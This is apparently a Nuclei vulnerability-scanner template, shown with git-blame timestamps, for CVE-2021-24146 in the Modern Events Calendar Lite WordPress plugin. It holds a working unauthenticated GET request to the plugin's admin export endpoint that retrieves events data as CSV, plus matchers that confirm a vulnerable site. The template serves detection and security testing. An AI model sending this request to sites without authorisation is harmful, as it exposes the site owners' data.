nuclei-templates/cves/2021/CVE-2021-24146.yaml

28 lines
901 B
YAML
Raw Normal View History

2021-04-23 03:17:52 +00:00
id: CVE-2021-24146
info:
name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
2021-04-23 03:17:52 +00:00
description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
author: random_robbie
2021-04-23 03:17:52 +00:00
severity: high
2021-04-23 03:08:45 +00:00
reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
2021-04-23 03:20:02 +00:00
tags: wordpress,wp-plugin,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
matchers-condition: and
matchers:
- type: word
words:
- "mec-events"
2021-06-17 01:16:54 +00:00
- "text/csv"
condition: and
part: header
2021-04-23 03:08:45 +00:00
- type: status
status:
- 200